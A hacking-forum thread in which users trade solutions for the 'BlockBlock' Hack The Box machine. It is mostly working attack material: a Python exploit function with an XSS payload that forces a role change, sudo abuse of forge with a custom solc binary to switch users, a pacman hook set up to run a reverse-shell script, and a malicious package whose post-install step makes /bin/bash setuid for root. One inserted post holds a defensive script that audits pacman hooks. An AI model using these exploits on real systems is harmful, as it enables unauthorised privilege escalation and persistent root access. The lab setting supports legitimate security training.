BLOCKBLOCK - HTB
by osamy7593 - Saturday November 16, 2024 at 07:12 PM
#51
(Nov 19, 2024, 04:08 AM)gfttjdb Wrote:
(Nov 19, 2024, 02:06 AM)grisun0 Wrote:
(Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?

{"error":"Proxy Couldn't verify token"}

I'm trying to use the token from /api/json-rpc to run the eth_getLogs method

    def do_lol(self, line):
        """
        Exploits a target by injecting a malicious payload and collecting admin information.
        This function performs the following steps:
        1. Logs in to the application with provided credentials.
        2. Injects a malicious payload to elevate the role of a user to 'admin.'
        3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
        4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
        Parameters:
        line (str): Additional parameters for the target.
        Returns:
        None
        """
        rhost = self.params["rhost"]
        url = f'http://{rhost}'
        lhost = self.params["lhost"]

        payload = (
            "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
            "body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
        )
        headers = {
            "Content-Type": "application/json"
        }
        s = requests.Session()
        print_msg(f"Logging in and sending payload to {url}")
        login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
        if login_response.status_code == 200:
            print_msg("Login successful. Injecting primary payload.")
            s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
            s.cookies.set(
                "token",
                "eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
                domain="blockblock.htb",
                path="/",
            )
            s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
            jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
            chat_address = "0x1234567890abcdef1234567890abcdef12345678"
            url = f"{url}/api/json-rpc"
            headers = {
                "Content-Type": "application/json",
                "token": jwt_secret["Authorization"],
            }
            payload = {
                "jsonrpc": "2.0",
                "method": f"{line}",
                "params": ["latest", False],
                "id": 1
            }
            print_msg(payload)
            response = s.post(url, headers=headers, json=payload)
            print_msg(response.json())

        return
Any nudge for root???

Yes, you need to upgrade to paul first (there's a message in this thread on how). From paul to root is via the pacman installer (chatGPT might help here).

(Nov 19, 2024, 05:32 AM)gfttjdb Wrote:
(Nov 19, 2024, 05:25 AM)hackemall Wrote:
(Nov 18, 2024, 05:36 PM)0x410x420x41 Wrote: Phew, finally rooted. The escalation to root is rather straightforward after you get paul... just create a malicious package with a post-install action and install it.

So straightforward that 80 people rooted, that makes sense.

How do I move on to paul? I got an error.

There's a message in this thread that tells you how, abusing the program keira can sudo...
Reply
#52
(Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:

Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.
Reply
#53
(Nov 19, 2024, 08:59 AM)test888 Wrote:
(Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:

Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

Something like this might help: chmod 777 "anything" so that anyone can access it. A good starting point is usually /var/crash or /tmp.
Reply
#54
I don't understand this box, I'm looking for a write-up.
Reply
#55
(Nov 19, 2024, 12:03 PM)xianling88 Wrote:
(Nov 19, 2024, 08:59 AM)test888 Wrote:
(Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:

Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

Something like this might help: chmod 777 "anything" so that anyone can access it. A good starting point is usually /var/crash or /tmp.

Figured out it was this and also the payload was not correct. Thank you very much!
Reply
#56
(Nov 19, 2024, 07:11 AM)hackemall Wrote: echo "[Trigger]" > /tmp/hooks/revshell.hook

Add Trigger Information:

Run these commands one by one:

echo "Operation = Install" >> /tmp/hooks/revshell.hook
echo "Type = Package" >> /tmp/hooks/revshell.hook
echo "Target = *" >> /tmp/hooks/revshell.hook

Add Action Information:

Run these commands one by one to add the action section:

echo "" >> /tmp/hooks/revshell.hook
echo "[Action]" >> /tmp/hooks/revshell.hook
echo "Description = Reverse shell as root" >> /tmp/hooks/revshell.hook
echo "When = PostTransaction" >> /tmp/hooks/revshell.hook
echo "Exec = /tmp/root_revshell.sh" >> /tmp/hooks/revshell.hook

Thanks but still can't get it to trigger my code. Trying to install the package to trigger the hook with this:
sudo pacman -S --noconfirm base --hookdir /tmp/hooks
I haven't been able to get it to trigger yet. What am I missing?

Reply
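Added example from my side (not code posted in this thread): a small audit that parses pacman hook files of the shape built above ([Trigger]/[Action] with When and Exec) and flags hooks loaded from a directory other than pacman's defaults, such as one passed with --hookdir, or whose Exec runs a file from a user-writable path. The trusted directories, writable prefixes, sample hook texts and paths are constructed assumptions for the demo.

```python
import configparser
from pathlib import PurePosixPath
TRUSTED_HOOK_DIRS = ("/etc/pacman.d/hooks", "/usr/share/libalpm/hooks")  # pacman defaults
WRITABLE_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/")  # unprivileged users can write here

def parse_hook(text):
    """Return ({Trigger keys}, {Action keys}) parsed from hook file text."""
    # Hooks may repeat keys (several Operation= lines); strict=False keeps the last one.
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str  # keep key case so 'Exec' is looked up as written
    cp.read_string(text)
    trigger = dict(cp["Trigger"]) if cp.has_section("Trigger") else {}
    action = dict(cp["Action"]) if cp.has_section("Action") else {}
    return trigger, action

def audit_hook(hook_path, text):
    """Return findings for one hook file; an empty list means nothing looked odd."""
    findings = []
    hook_dir = str(PurePosixPath(hook_path).parent)
    if hook_dir not in TRUSTED_HOOK_DIRS:  # e.g. a directory supplied via --hookdir
        findings.append(f"hook loaded from non-default directory {hook_dir}")
    trigger, action = parse_hook(text)
    exec_bin = action.get("Exec", "").split()[:1]
    if not exec_bin:
        findings.append("Action has no Exec line")
    elif exec_bin[0].startswith(WRITABLE_PREFIXES):
        findings.append(f"Exec runs a file from a user-writable path: {exec_bin[0]}")
    if trigger.get("Target") == "*" and action.get("When") == "PostTransaction":
        findings.append("wildcard Target fires after every package transaction")
    return findings
# Constructed sample hooks: the first has the shape a defender should flag.
SUSPICIOUS_HOOK = """[Trigger]
Operation = Install
Type = Package
Target = *

[Action]
When = PostTransaction
Exec = /tmp/hooks/refresh.sh
"""
BENIGN_HOOK = """[Trigger]
Operation = Install
Operation = Upgrade
Target = usr/share/applications/*.desktop

[Action]
When = PostTransaction
Exec = /usr/bin/update-desktop-database -q
"""
```

Running audit_hook over every *.hook under the default directories plus any --hookdir seen in sudo logs gives a quick list of hooks worth a second look.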
#57
For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step:

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p


I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.
Reply
#58
(Nov 19, 2024, 06:01 PM)ritualist Wrote: For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step:

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p


I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.
Not working, bro.
[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.


Reply
#59
(Nov 19, 2024, 06:26 PM)gfttjdb Wrote:
(Nov 19, 2024, 06:01 PM)ritualist Wrote: For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step:

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p


I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.
Not working, bro.
[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.

It's for paul -> root
See my previous post for getting from keira to paul.
Reply
#60
(Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:

Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.
Can anyone provide the exploit??

Reply